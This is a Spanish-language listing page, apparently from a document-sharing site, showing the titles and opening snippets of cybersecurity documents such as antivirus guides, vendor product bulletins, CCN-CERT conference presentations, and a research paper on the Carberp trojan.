1. Virus y antivirus. Módulo I. Navegación segura. Ciudadanía digital. Uso seguro y responsable de las TIC. 3 de 127 1. Virus y antivirus La seguridad del ordenador es una tarea básica e imprescindible para cualquier usuario que accede a Internet. Por este motivo es conveniente que forme parte del currículum cuando se

Más detalles

China y el ciberespionaje

China y el ciberespionaje La defensa del patrimonio tecnológico frente a los ciberataques 10 y 11 de diciembre de 2014 China y el ciberespionaje APT1, Sun Tzu y los tiempos interesantes 2014 Centro Criptológico Nacional C/Argentona

Más detalles

AUTOPSIA FORENSE DE UN ATAQUE DIRIGIDO

AUTOPSIA FORENSE DE UN ATAQUE DIRIGIDO AUTOPSIA FORENSE DE UN ATAQUE DIRIGIDO Trucos y técnicas para la realización de Un Análisis Forense extremo Pedro Sánchez Agenda Autopsia forense 1.- Repaso actual de la seguridad 2.-Caso real de una

Más detalles

Amenazas y Vulnerabilidades a los Sistemas de Información y Comunicaciones. Conclusiones 2010 Tendencias 2011 SIN CLASIFICAR

Amenazas y Vulnerabilidades a los Sistemas de Información y Comunicaciones. Conclusiones 2010 Tendencias 2011 SIN CLASIFICAR Amenazas y Vulnerabilidades a los Sistemas de Información y Comunicaciones. Conclusiones 2010 Tendencias 2011 Madrid, marzo de 2011 Presentación FORO: VII ciclo de conferencias. Temas avanzados en Seguridad

Más detalles

Presentada por: Enrique Lannes Gerente de Ventas America Latina

Presentada por: Enrique Lannes Gerente de Ventas America Latina Presentada por: Enrique Lannes Gerente de Ventas America Latina 3 4 CIBERWAR en su propia red. 1800 ataques exitosos por semana en grandes organizaciones 3 67% de la infraestructura actual no puede detener

Más detalles

ANTIVIRUS ANTIVIRUS ESET EESET NOD32 N NOD32 Por qué cambiar cambiar a E SET EESET ESET NOD32? NOD32?

ANTIVIRUS ANTIVIRUS ESET EESET NOD32 N NOD32 Por qué cambiar cambiar a E SET EESET ESET NOD32? NOD32? <info@planatec.es> ANTIVIRUS ESET NOD32 Por qué cambiar a ESET NOD32? POR QUÉ NOD32? La eficacia de ESET NOD32 combinada con su increíble velocidad de análisis (entre 2 y 50 veces más rápido que la competencia)

Más detalles

Capacitación VMS Políticas de VRIS. Seguridad Integral, Detección, Limpieza y Reparación Total

Capacitación VMS Políticas de VRIS. Seguridad Integral, Detección, Limpieza y Reparación Total Capacitación VMS Políticas de VRIS Seguridad Integral, Detección, Limpieza y Reparación Total Descripción Las políticas de VRIS controlan las opciones de operación de ViRobot, como por ejemplo: Protección

Más detalles

Experiencias y tendencias en Investigaciones Digitales de gran escala

Experiencias y tendencias en Investigaciones Digitales de gran escala La defensa del patrimonio tecnológico frente a los ciberataques 10 y 11 de diciembre de 2014 Experiencias y tendencias en Investigaciones Digitales de gran escala 2014 Centro Criptológico Nacional C/Argentona

Más detalles

Capacitación VMS Políticas de Agente. Seguridad Integral, Detección, Limpieza y Reparación Total

Capacitación VMS Políticas de Agente. Seguridad Integral, Detección, Limpieza y Reparación Total Capacitación VMS Políticas de Agente Seguridad Integral, Detección, Limpieza y Reparación Total 1 RIS VRSP Pantalla Principal General Menu de inicio: Visualizamos las opciones de escaneo y configuración

Más detalles

CREANDO UN MODELO DE CIBERSEGURIDAD REACCIÓN O PROACTIVIDAD, EL NUEVO RETO

CREANDO UN MODELO DE CIBERSEGURIDAD REACCIÓN O PROACTIVIDAD, EL NUEVO RETO CREANDO UN MODELO DE CIBERSEGURIDAD REACCIÓN O PROACTIVIDAD, EL NUEVO RETO Presentada por: Gómez Boris Senior Sales System Engineer Ciberdelincuentes 3 November 22, 2013 Cambiando el panorama The modern

Más detalles

BOLETÍN DE ALERTA. Figura 1: Ejemplo de comentario con enlace a una noticia falsa

BOLETÍN DE ALERTA. Figura 1: Ejemplo de comentario con enlace a una noticia falsa BOLETÍN DE ALERTA Boletín Nro. : 2016-02 Fecha de publicación : 08/01/2016 Tema : Distribución de malware para Android a través de comentarios falsos Descripción : Hace un tiempo se ha observado un importante

Más detalles

CHECK POINT. DE LA EMPRESA Incluidos emails, mensajes de texto y registro de llamadas

CHECK POINT. DE LA EMPRESA Incluidos emails, mensajes de texto y registro de llamadas CHECK POINT DESMITIFICANDO LOS ATAQUES A LA SEGURIDAD DE DISPOSITIVOS MÓVILES Los ataques a sus dispositivos móviles y al tráfico de la red están evolucionando rápidamente. Los atacantes de dispositivos

Más detalles

Quien se ha robado mi perímetro?. Seguridad para entornos virtuales y de nube. Andres P Giarletta Sr. Systems Engineer Manager

Quien se ha robado mi perímetro?. Seguridad para entornos virtuales y de nube. Andres P Giarletta Sr. Systems Engineer Manager Quien se ha robado mi perímetro?. Seguridad para entornos virtuales y de nube. Andres P Giarletta Sr. Systems Engineer Manager E-Mail: Andres.giarletta@kaspersky.com Lima 14 de Julio del 2015 El Datacenter

Más detalles

MOTOR ANTIVIRUS DE SEGURMÁTICA: PARA EL PRESENTE Y EL FUTURO SEGURMÁTICA ANTIVIRUS ENGINE: FOR PRESENT AND FUTURE

MOTOR ANTIVIRUS DE SEGURMÁTICA: PARA EL PRESENTE Y EL FUTURO SEGURMÁTICA ANTIVIRUS ENGINE: FOR PRESENT AND FUTURE Revista Telem@tica. Vol. 13. No. 1, enero-abril, 2014, p. 12-19 ISSN 1729-3804 MOTOR ANTIVIRUS DE SEGURMÁTICA: PARA EL PRESENTE Y EL FUTURO SEGURMÁTICA ANTIVIRUS ENGINE: FOR PRESENT AND FUTURE Lic. Alejandro

Más detalles

2013-07-02. CiberNoticias. SCProgress. www.scprogress.com

2013-07-02. CiberNoticias. SCProgress. www.scprogress.com 2013-07-02 CiberNoticias SCProgress www.scprogress.com ÍNDICE 1. Avira explica cómo detectar el malware y qué consejos de seguridad hay que seguir con los navegadores.........03 2. Falla de seguridad en

Más detalles

Carberp Un troyano modular para robar información.

Carberp Un troyano modular para robar información. Carberp Un troyano modular para robar información. Marco Giuliani Director, Prevx Advanced Malware Research Team Andrea Allievi Investigador Malware Prevx Un Exclusivo PRÓLOGO Hoy en día la mayoría de

Más detalles

La seguridad 2.0. Citas. Seguridad. La seguridad de información esta caracterizada por la preservación de: Para ello, se requiere de:

La seguridad 2.0. Citas. Seguridad. La seguridad de información esta caracterizada por la preservación de: Para ello, se requiere de: OWASP AppSec Aguascalientes 2011 The OWASP Foundation http://www.owasp.org Citas La seguridad 2.0 Pablo Lugo G - La seguridad no es un producto, es un proceso. Bruce Schneier. Experto en seguridad. - La

Más detalles

INFORME TÉCNICO PARA LA ADQUISICIÓN DE SOFTWARE ANTIVIRUS DE LA MUNICIPALIDAD PROVINCIAL DE CHUPACA

INFORME TÉCNICO PARA LA ADQUISICIÓN DE SOFTWARE ANTIVIRUS DE LA MUNICIPALIDAD PROVINCIAL DE CHUPACA INFORME TÉCNICO PARA LA ADQUISICIÓN DE SOFTWARE ANTIVIRUS DE LA MUNICIPALIDAD PROVINCIAL DE CHUPACA 1. NOMBRE DEL ÁREA: OPP-INFORMATICA 2. RESPONSABLES DE LA EVALUACION DAYGOR GARCIA INGA 3. CARGO RESPONSABLE

Más detalles

ESET NOD32 Antivirus 4.2 ESET NOD32 Antivirus 4.2 (Business Edition)

ESET NOD32 Antivirus 4.2 ESET NOD32 Antivirus 4.2 (Business Edition) ESET NOD32 Antivirus 4.2 ESET NOD32 Antivirus 4.2 (Business Edition) Boletín de Producto 11 de Marzo de 2010 Versión 2.6 ESET NOD32 Antivirus 4 Todos los usuarios necesitan contar con una protección completa

Más detalles

G Data Informe técnico. Behaviour Blocking. (Escudo de comportamiento) Go safe. Go safer. G Data. Marco Lauerwald Marketing

G Data Informe técnico. Behaviour Blocking. (Escudo de comportamiento) Go safe. Go safer. G Data. Marco Lauerwald Marketing G Data Informe técnico Behaviour Blocking (Escudo de comportamiento) Marco Lauerwald Marketing Go safe. Go safer. G Data. Indice 1 Behaviour Blocking Objetivo: Combatir amenazas desconocidas... 2 1.1 Parásitos

Más detalles

Apellidos Nombre DNI

Apellidos Nombre DNI A continuación se muestra el listado de un programa cuyo objetivo es encontrar una palabra dentro de una cadena de caracteres de la sección de datos y copiar dicha palabra en otra zona de la sección de

Más detalles

Best Practices for controlling Advanced Threats and their Persistence. Matthew Ancelin Cybersecurity Analyst

Best Practices for controlling Advanced Threats and their Persistence. Matthew Ancelin Cybersecurity Analyst Best Practices for controlling Advanced Threats and their Persistence Matthew Ancelin Cybersecurity Analyst Mejores prácticas para controlar las Amenazas Avanzadas y su Persistencia Matthew Ancelin Cybersecurity

Más detalles

MDM: Un enfoque de productividad y seguridad

MDM: Un enfoque de productividad y seguridad MDM: Un enfoque de productividad y seguridad Armando Enrique Carvajal Rodríguez Gerente Arquitecto de Seguridad de la información - Globaltek Security S.A Master en seguridad informática - Universidad

Más detalles

Puede cualquier empresa ser hackeada? Joel Bo Maximiliano Cittadini EDSI Trend Argentina

Puede cualquier empresa ser hackeada? Joel Bo Maximiliano Cittadini EDSI Trend Argentina Puede cualquier empresa ser hackeada? Joel Bo Maximiliano Cittadini EDSI Trend Argentina Tom Kellermann, vice president of cyber security at Trend Micro, discusses the rising threat of cyber terrorism

Más detalles

New Generation. Secure your Network. Totally Reloaded. www.hauri-la.com

New Generation. Secure your Network. Totally Reloaded. www.hauri-la.com New Generation Secure your Network Totally Reloaded www.hauri-la.com Menos Trabajo + Protección Completa Más Características Simplifica tus tareas administrativas a través del Administrador del Historial

Más detalles

VII Jornadas STIC CCN-CERT

VII Jornadas STIC CCN-CERT VII Jornadas STIC CCN-CERT La ciberseguridad, un factor estratégico nacional" 10 y 11 de diciembre 2013 www.ccn-cert.cni.es 2013 Centro Criptológico Nacional C/Argentona 20, 28023 MADRID 2 VII Jornadas

Más detalles

Servicios CCN-CERT Amenazas 2011

Servicios CCN-CERT Amenazas 2011 ESQUEMA NACIONAL DE SEGURIDAD Servicios CCN-CERT Amenazas 2011 Madrid, marzo de 2012 Índice Introducción Servicios de Alerta Temprana SAT SARA / INTERNET SAT CARMEN Formación Mejores prácticas 1. Guías

Más detalles

Instalación de antivirus

Instalación de antivirus Instalación de antivirus Instalación de avast antivirus Acceder a la dirección: http://www.avast.com/es-ww/free-antivirus-mac Pulsar sobre DESCARGAR. En el finder ir a descargas. Hacer doble clic sobre

Más detalles

Mejora en el Proceso de Desempacado usando Técnicas DBI

Mejora en el Proceso de Desempacado usando Técnicas DBI Mejora en el Proceso de Desempacado usando Técnicas DBI Ricardo J. Rodríguez rjrodriguez@unizar.es tw: @RicardoJRdez http://www.ricardojrodriguez.es 3 de Marzo de 2012 RootedCON 2012 Madrid, Spain 2 /

Más detalles

La Seguridad de la Web es un Problema? La Respuesta está en la Arquitectura. Copyright 2015 Blue Coat Systems, Inc. Reservados todos los derechos.

La Seguridad de la Web es un Problema? La Respuesta está en la Arquitectura. Copyright 2015 Blue Coat Systems, Inc. Reservados todos los derechos. La Seguridad de la Web es un Problema? La Respuesta está en la Arquitectura Copyright 2015 Blue Coat Systems, Inc. Reservados todos los derechos. 1 Presentada por: Andrés García Director de Ingeniería

Más detalles

Resumen del cortafuegos de nueva generación de Palo Alto Networks

Resumen del cortafuegos de nueva generación de Palo Alto Networks PALO ALTO PALO NETWORKS: ALTO NETWORKS: Resumen Resumen de las de funciones las funciones del cortafuegos del cortafuegos de nueva de generación nueva generación Resumen del cortafuegos de nueva generación

Más detalles

VIRUS Y SEGURIDAD TECNOLÓGICA EN LA DOCENCIA

VIRUS Y SEGURIDAD TECNOLÓGICA EN LA DOCENCIA VIRUS Y SEGURIDAD TECNOLÓGICA EN LA DOCENCIA AUTORÍA Mª JOSÉ PALOMAR SÁNCHEZ TEMÁTICA TIC S ETAPA ESO, BACHILLER, F.P. Resumen En este artículo se pretende dar una amplia visión sobre los virus informáticos

Más detalles

Qué es un virus computacional y qué hacer en caso de virus?

Qué es un virus computacional y qué hacer en caso de virus? Qué es un virus computacional y qué hacer en caso de virus? Qué es un virus computacional? Como hay de varios tipos, la definición de virus computacional dependerá de lo que haga, ya que han ido surgiendo

Más detalles

B-HAVE EL CAMINIO HACIA EL ÉXITO

B-HAVE EL CAMINIO HACIA EL ÉXITO B-HAVE EL CAMINIO HACIA EL ÉXITO Caso práctico sobre la éxitosa implementación de la nueva tecnología anti-malware En Octubre de 2004, AV-Test, una compañía independiente dedicada a la realización de pruebas

Más detalles